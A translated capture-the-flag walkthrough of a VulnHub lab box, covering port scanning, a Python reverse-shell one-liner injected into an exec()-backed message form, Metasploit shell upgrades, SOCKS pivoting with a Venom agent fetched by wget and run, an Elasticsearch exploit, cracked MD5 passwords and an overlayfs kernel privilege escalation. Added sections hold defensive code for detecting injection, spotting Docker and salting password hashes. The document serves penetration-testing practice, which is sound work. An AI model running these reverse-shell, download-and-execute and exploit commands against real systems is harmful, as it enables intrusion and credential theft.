Article directory
- Environment build
- Information collection
- Host discovery
- Port scanning
- Web penetration
- (CVE-2019-14322) Pallets Werkzeug 0.15.4 path traversal vulnerability
- Code injection – reverse shell
- About Dockerfile
- Determining whether we are in a Docker environment
- Upgrading a command shell to Meterpreter
- Method 1
- Method 2
- There is an intranet behind the Docker environment
- Intranet host discovery
- Shell script – ping sweep for live IPs
- Intranet penetration – local msf automation
- Manual intranet penetration via a public VPS
- Venom proxy
- Vulnerability exploitation – kernel privilege escalation – modifying the exploit code
- Thoughts and questions
- Reference
Keywords: host discovery, port scanning, service discovery, path crawling, code injection, shell script, intranet information collection, intranet penetration, exploit, password cracking, local privilege escalation, attack code modification
Environment build
Official website download address (download is slow): https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
Target machine Baidu cloud link
When I first built it, host discovery showed that the target exposed only SSH on port 22, and I wondered whether the whole box came down to an SSH brute force. After checking, I learned that the target should also expose port 5000, so I re-downloaded and re-imported the VM, after which it worked. (There is also the case where the host cannot be discovered at all; that is probably a network-adapter setting.)
Information collection
Host Discovery:
arp-scan -l
Port scanning
nmap -sS -sV -T4 -A -p- 10.10.10.154
Two lines of thought: 1. SSH brute force; 2. the Python web service on port 5000.
SSH brute force: down to luck.
use auxiliary/scanner/ssh/ssh_login
set rhost 10.10.10.154
set USER_FILE user.txt
set PASS_FILE pass.txt
run
Web penetration
Directory scan with dirsearch
python3 dirsearch.py -u http://10.10.10.154:5000/ -e html js
Tried inserting some XSS; not analyzed further.
Based on the service information detected:
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
Look up known vulnerabilities that match this version.
(CVE-2019-14322) Pallets Werkzeug 0.15.4 path traversal vulnerability
Searching Werkzeug's historical vulnerabilities turned up this one:
In Pallets Werkzeug prior to 0.15.5, SharedDataMiddleware mishandled drive names in Windows pathnames.
Tried the PoC; the vulnerability is not present (the issue concerns Windows drive letters, and this target runs on Linux).
Code injection – reverse shell
According to the hint on the page, there may be code execution here.
Reverse-shell generator: https://forum.ywhack.com/shell.php
The target is a Python environment, so try injecting the Python version of the reverse-shell command.
Another problem: the snippets given there are all meant to be run from a command line, but the hint on the target page says the input is executed by the exec() function, so pasting them verbatim does not give a shell.
Using just the middle part, the Python statements themselves, it connects normally.
Payload
import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("47.94.xx.xx",5566)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
In Python, semicolons can separate multiple statements on one line; here they put the whole payload on a single line so that only one line needs to be copied and pasted into the form.
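The root cause here is that the message form hands user input to exec(). The detective side of that, as an added example that is not part of the original write-up: a small Python 3 scorer that flags submitted messages containing the building blocks of the payload above (network imports, os.dup2 redirection, subprocess spawning, a shell path, an outbound connect). The message texts, indicator weights, threshold and the 203.0.113.10 address are constructed for the example. A check like this belongs in request logging or a WAF as a tripwire; the actual fix is to never pass user input to exec().

```python
import re

# Constructed sample inputs (not from the write-up's target): an ordinary guestbook
# message and a Python reverse-shell one-liner of the kind pasted into the exec()-backed
# form. 203.0.113.10 is a documentation address used as a placeholder.
BENIGN_MESSAGE = "Hi all, great site! Looking forward to the meetup on Friday."
INJECTED_MESSAGE = (
    'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); '
    's.connect(("203.0.113.10",5566)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); '
    'os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
)

# Weighted indicators (weights are constructed). No single one is proof: a message
# about Python programming may legitimately say "import os", hence a score, not a match.
INDICATORS = [
    ("import of network/process module", re.compile(r"\bimport\s+(socket|subprocess|os|pty)\b"), 2),
    ("fd redirection via os.dup2", re.compile(r"\bos\.dup2\s*\("), 3),
    ("process spawn via subprocess", re.compile(r"\bsubprocess\.(call|Popen|run)\s*\("), 3),
    ("socket creation", re.compile(r"\bsocket\.socket\s*\("), 2),
    ("shell path", re.compile(r"/bin/(ba)?sh\b"), 2),
    ("dynamic code execution", re.compile(r"\b(exec|eval|__import__)\s*\("), 3),
    ("outbound connect", re.compile(r"\.connect\s*\(\s*\("), 2),
]
THRESHOLD = 5


def injection_score(message):
    """Return (score, [names of matched indicators]) for one submitted message."""
    score = 0
    hits = []
    for name, pattern, weight in INDICATORS:
        if pattern.search(message):
            score += weight
            hits.append(name)
    return score, hits


def looks_like_code_injection(message, threshold=THRESHOLD):
    """True when the weighted indicator score reaches the threshold."""
    return injection_score(message)[0] >= threshold


if __name__ == "__main__":
    for label, msg in (("benign", BENIGN_MESSAGE), ("injected", INJECTED_MESSAGE)):
        score, hits = injection_score(msg)
        print("%-8s score=%2d flagged=%s hits=%s" % (label, score, looks_like_code_injection(msg), hits))
```

The scorer is deliberately a blocklist and can be evaded by encoding or string building; that is exactly why it is only a detection aid. Removing exec() from the request path is the control that closes the hole.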
After running the relevant commands, a Dockerfile was found, which suggests that the web service on port 5555 may be running inside Docker.
About Dockerfile
A Dockerfile defines the image, and a container runs from that image, so the Dockerfile is the key to both image and container.
A Dockerfile is a text file containing a series of instructions; each instruction builds one layer, so the content of each instruction describes how that layer should be built.
Determining whether we are in a Docker environment:
Method 1: check for the .dockerenv file in the root directory
ls -alh /.dockerenv  # a non-Docker host does not have this .dockerenv file
Method 2: inspect the cgroup information of PID 1
cat /proc/1/cgroup
In a Docker environment the output looks like this:
Outside Docker it looks like this:
Confirmed: this is a Docker environment.
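Both checks above can be wrapped into one routine. The following is an added Python 3 example, not code from the write-up; the sample /proc/1/cgroup contents and hex ids are constructed. It also covers a case the two commands alone miss: on a cgroup v2 host, /proc/1/cgroup inside a container usually reads just 0::/, so the cgroup method says nothing and only /.dockerenv remains as evidence.

```python
import os

# Paths that container runtimes put in a process's cgroup hierarchy (cgroup v1,
# covering both the cgroupfs and the systemd cgroup drivers).
CONTAINER_MARKERS = ("/docker/", "/docker-", "/lxc/", "/kubepods")

# Constructed samples of /proc/1/cgroup content (the hex ids are made up):
CGROUP_V1_DOCKER = (
    "12:devices:/docker/3f2a1b9c0d4e5f6a7b8c9d0e1f2a3b4c\n"
    "11:memory:/docker/3f2a1b9c0d4e5f6a7b8c9d0e1f2a3b4c\n"
    "1:name=systemd:/docker/3f2a1b9c0d4e5f6a7b8c9d0e1f2a3b4c\n"
)
CGROUP_V1_HOST = (
    "12:devices:/\n"
    "11:memory:/\n"
    "1:name=systemd:/init.scope\n"
)
CGROUP_V2_ANY = "0::/\n"  # what a container, and some hosts, show on cgroup v2


def cgroup_indicates_container(cgroup_text):
    """Method 2 from the write-up: look for a container runtime path in cgroup v1 lines."""
    for line in cgroup_text.splitlines():
        parts = line.split(":", 2)  # hierarchy-id : controllers : path
        if len(parts) != 3:
            continue
        if any(marker in parts[2] for marker in CONTAINER_MARKERS):
            return True
    return False


def cgroup_is_v2_only(cgroup_text):
    """cgroup v2 unified hierarchy: a single '0::<path>' line, which inside a
    container is normally just '0::/' and therefore carries no signal."""
    lines = [ln for ln in cgroup_text.splitlines() if ln.strip()]
    return len(lines) == 1 and lines[0].startswith("0::")


def detect_docker(cgroup_text, dockerenv_present):
    """Combine both checks. Returns 'docker', 'not-docker' or 'unknown'."""
    if dockerenv_present or cgroup_indicates_container(cgroup_text):
        return "docker"
    if cgroup_is_v2_only(cgroup_text):
        return "unknown"  # method 1 absent and method 2 blind: cannot tell
    return "not-docker"


def detect_docker_on_this_host(cgroup_path="/proc/1/cgroup", dockerenv_path="/.dockerenv"):
    """Run the combined check against the live system (meaningful on Linux only)."""
    try:
        with open(cgroup_path) as fh:
            text = fh.read()
    except OSError:
        text = ""
    return detect_docker(text, os.path.exists(dockerenv_path))


if __name__ == "__main__":
    print("constructed v1 docker :", detect_docker(CGROUP_V1_DOCKER, False))
    print("constructed v1 host   :", detect_docker(CGROUP_V1_HOST, False))
    print("constructed v2, no env:", detect_docker(CGROUP_V2_ANY, False))
    print("this host             :", detect_docker_on_this_host())
```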
Command Shell upgrade to Meterpreter
Because msf is more convenient, hand the shell over to msf.
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 6677
msf6 exploit(multi/handler) > exploit
In another window, listen on local port 6677 and use nc to connect back once more.
Now there is only a plain command shell, but how can the other functions of msf be used? Upgrade the command shell to Meterpreter.
Method 1
sessions -u 1
Unfortunately, the upgrade did not succeed from the public VPS.
Tested from a Kali box on the same LAN: it works.
Method 2
msf6 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > exploit
Still no success with the upgrade here; I suspect it is a problem with the public VPS I am using. With local Kali it works.
There is an intranet behind the Docker environment
Intranet host discovery
ip a
The subnet mask here is 16 bits, so the network can hold at most 2^16 addresses.
Shell script – ping sweep for live IPs
for i in $(seq 1 254); do for j in $(seq 1 254); do ping -c 1 172.17.$i.$j; done; done  # sweep the whole 172.17.0.0/16 (254 x 254 addresses, slow)
Since this is a Docker environment, there will not be that many containers running, so only the /24 (C-class) segment is scanned.
for i in $(seq 1 254);do ping -c 1 172.17.0.$i;done
Three hosts are alive: apart from our own 172.17.0.2, the other two are 172.17.0.1 and 172.17.0.3.
Because other tools cannot be used directly from the reverse bash shell for intranet penetration, a proxy is used here.
Intranet penetration – local msf automation
Add routes automatically
Add a proxy
use auxiliary/server/socks_proxy
set SRVPORT 1234
run
Modify the proxychains configuration file
vi /etc/proxychains.conf
Then use proxychains for the subsequent operations.
Service detection from local Kali is much faster than going through the VPS.
proxychains nmap -sV -sT 172.17.0.1
proxychains nmap -sV -sT 172.17.0.2
Note the HTTP service on port 9200 here.
proxychains nmap -sV -sT 172.17.0.3
Several questions remain here:
- Hosts 1 and 3 both have port 5000 open with the same service. Which one is the intranet IP of 10.10.10.154?
- And what is the network layout of this intranet environment built with Docker?
Using Firefox on local Kali with the SOCKS proxy configured, access port 5000 on hosts 1 and 3 and port 9200 on host 2.
Leaving a message on 10.10.10.154 from the physical machine at the same time shows that both 1 and 3 correspond to this same website.
Access 172.17.0.2:9200
Look up the publicly known vulnerabilities for Elasticsearch version 1.4.2.
Find an exploit to use directly
https://github.com/t0kx/exploit-CVE-2015-1427
It gives root directly, although this appears to be only a PoC.
The exploit can also be found locally with searchsploit:
searchsploit elasticsearch
proxychains python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2
This yields some users and MD5-hashed passwords; put them into cmd5.com to look them up.
Some can be recovered; some require payment…
The one that works for login is john:1337hack
SSH can be used to log in directly here.
After logging in over SSH, it turns out to be an ordinary user account.
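The passwords fell to an online lookup because they were stored as unsalted MD5. As an added example (not part of the original write-up, standard library only), the following contrasts that storage with PBKDF2-HMAC-SHA256 and a per-user random salt. The demo user, the four-entry wordlist and the record format are constructed; the value 1337hack is reused from the write-up only as a known-weak sample.

```python
import hashlib
import hmac
import os

# Constructed record in the style of what the write-up pulls from the index:
# a username and an unsalted MD5 of a weak password. 'demo' is a hypothetical user.
LEGACY_RECORD = {"user": "demo", "md5": hashlib.md5(b"1337hack").hexdigest()}

# A tiny constructed wordlist; online lookup services hold billions of precomputed entries.
WORDLIST = ["password", "123456", "1337hack", "letmein"]

PBKDF2_ITERATIONS = 600_000  # order of magnitude currently recommended for PBKDF2-HMAC-SHA256


def crack_unsalted_md5(digest_hex, wordlist):
    """Why unsalted MD5 falls immediately: one cheap hash per candidate, and the same
    precomputed table serves every user on every site because nothing is salted."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == digest_hex:
            return candidate
    return None


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Store passwords as PBKDF2-HMAC-SHA256 with a per-user random 16-byte salt.
    Output format (constructed for this example): scheme$iterations$salt_hex$dk_hex."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    scheme, iterations, salt_hex, dk_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported scheme: %s" % scheme)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    recovered = crack_unsalted_md5(LEGACY_RECORD["md5"], WORDLIST)
    print("legacy md5 record for %s recovered as: %s" % (LEGACY_RECORD["user"], recovered))
    stored = hash_password("1337hack")
    print("same password, salted PBKDF2:", stored)
    print("verify correct:", verify_password("1337hack", stored))
    print("verify wrong  :", verify_password("1337hacK", stored))
```

With the salted form, two users who chose the same password get different stored values, and a lookup table built for one site is useless against another; the iteration count then makes each guess expensive.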
Manual intranet penetration via a public VPS
Venom proxy
https://github.com/Dliv3/Venom
Venom is a multi-level proxy tool developed in Go designed for penetration testers.
Venom can connect multiple nodes, and then use the nodes as a springboard to build multi-level agents.
Penetration testers can use Venom to easily proxy network traffic to multi-layer intranets and manage proxy nodes easily.
Start the server (on the VPS)
./admin_linux_x64 -lport 7777
Start a temporary HTTP server with Python, then download and run the agent on the target machine.
python3 -m http.server 88  # run this in the Venom directory
Run in the target machine's shell:
wget http://47.94.130.42:88/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 47.94.130.42 -rport 7777  # start the client
The server shows a successful connection and a session is obtained; enter the session and start a SOCKS proxy.
Tools are of course still needed to forward traffic; on Linux that is proxychains.
For Windows proxy details, see: Proxy Socks Protocol & Routing without going online & Post-exploitation communication & CS-MSF control going online
Here I use local Kali to connect to the SOCKS proxy opened on the VPS (the tooling is more convenient).
Modify the configuration file:
vim /etc/proxychains.conf
proxychains nmap -sV -sT 172.17.0.1
No port range is specified here, so only some common services and ports are scanned.
proxychains nmap -sV -sT 172.17.0.1 -p 1-65535  # -p specifies the port range
The scan takes only a minute or two; without going through the public proxy it may be faster. In a real environment, of course, you need to control the scan rate so that the proxy IP does not get blocked. The remaining penetration steps are equivalent to the msf automation above, so no further demos.
Vulnerability exploitation – kernel privilege escalation – modifying the exploit code
Here I uploaded les.sh for analysis to look for exploitable vulnerabilities. I started with the classic Dirty COW, but when compiling I found that there is no gcc on the target, and of course no permission to use the package manager (to install gcc). I wondered whether another compiler such as clang or tcc could be used to compile my own exploit program; naturally there was none. So what about compiling it locally into an executable and uploading that?
We all know that programs compiled for different Linux architectures are not interchangeable (different instruction sets). Looking it up: GCC can target multiple architectures from one machine, which means a GCC toolchain on x86 can also produce programs that run on ARM. So I uploaded the Dirty COW exploit compiled locally on Kali to the target machine.
It reports that the libstdc++ library is missing. Trying apt-get install libstdc++6 gives "permission denied", so could the library file be copied over from Kali? The copied file would need to be placed in /usr/lib/, otherwise the program cannot load it, but ordinary users are not allowed to write to that directory. Just as I was giving up, I saw the "attack code modification" hint given by the range and thought of changing the Dirty COW source to load the library file from a location I put it in, then recompiling and using that. But my skills were not up to it; after staring at the C source for a while I was lost… (There is no library loading anywhere in the Dirty COW exploit source, so let's switch to another vulnerability for privilege escalation.)
**This is the exploit used by other experts: 'overlayfs' Local Privilege Escalation**
Applicable Linux kernel versions: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)
Location of the exploit on Kali:
/usr/share/exploitdb/exploits/linux/local/37292.c
Remove the problematic part of the code and compile it on Kali; it is normal for it to report an error, and the program is still generated.
Following the idea above, locate the ofs-lib.so file, package it together with the exploit, place both on the target machine, grant execute permission, and run.
locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
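The kernel version range stated above is the kind of fact a tool like les.sh keys on. The following is an added Python 3 example, not from the write-up or from exploit-db, that turns a `uname -r` string into a comparable tuple and checks it against that range; the sample release strings are constructed. The caveat worth remembering on the defensive side is in the triage() docstring: distribution kernels backport fixes without changing the upstream version number, so a match here means "review the distro package changelog", not "vulnerable".

```python
import re

# Range as stated above for the overlayfs LPE: 3.13.0 <= kernel < 3.19
AFFECTED_MIN = (3, 13, 0)
AFFECTED_MAX_EXCLUSIVE = (3, 19, 0)

# Constructed sample `uname -r` strings (not taken from the target machine):
SAMPLE_RELEASES = [
    "3.13.0-24-generic",
    "3.16.0-4-amd64",
    "3.19.0-18-generic",
    "4.4.0-21-generic",
    "5.15",
]


def parse_kernel_release(release):
    """Turn '3.13.0-24-generic' into (3, 13, 0); the distro suffix after '-' is ignored."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % (release,))
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def in_affected_range(release, lo=AFFECTED_MIN, hi=AFFECTED_MAX_EXCLUSIVE):
    """True when the upstream version lies in [lo, hi)."""
    return lo <= parse_kernel_release(release) < hi


def triage(release):
    """Patch-management verdict. 'review' means the upstream version is in range and
    the distribution's package changelog must be checked for a backported fix; it is
    not a statement that the host is exploitable."""
    return "review" if in_affected_range(release) else "not-in-range"


if __name__ == "__main__":
    for rel in SAMPLE_RELEASES:
        print("%-20s %s -> %s" % (rel, parse_kernel_release(rel), triage(rel)))
```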
Thoughts and questions
Not skilled at using msf exploits
Not familiar with building an intranet environment with Docker
After seeing the Docker environment, I didn't try any escape techniques, because the target's description didn't include the keyword "escape"; in a real environment one should try to escape.
My skill at modifying exploits isn't sufficient, and I'm not familiar with library loading and the compilation process
One target machine for one whole day, emmm
If the content of the article is lacking, it will be supplemented later
Reference
https://www.freebuf.com/articles/web/321995.html
2023-3-24, written by whgojp